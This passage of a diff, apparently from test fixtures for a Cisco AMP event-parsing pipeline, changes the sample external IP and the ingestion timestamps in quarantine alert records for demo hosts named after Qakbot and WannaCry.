Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", + "ingested": "2021-12-09T13:35:39.763818700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -815,7 +815,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -856,7 +856,7 @@ "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -866,8 +866,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025226909Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", + "ingested": "2021-12-09T13:35:39.763824800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -887,7 +887,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -932,7 +932,7 @@ "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -942,8 +942,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025229372Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", + "ingested": "2021-12-09T13:35:39.763831200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -963,7 +963,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1008,7 +1008,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1018,8 +1018,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025231667Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763837500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1039,7 +1039,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1084,7 +1084,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1094,8 +1094,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025233899Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763843500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1115,7 +1115,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1160,7 +1160,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1170,8 +1170,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025236153Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763848400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1191,7 +1191,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1236,7 +1236,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1246,8 +1246,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025238376Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763852200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1267,7 +1267,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1312,7 +1312,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1322,8 +1322,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025240785Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763857100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1343,7 +1343,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1388,7 +1388,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1398,8 +1398,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025243063Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763863200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 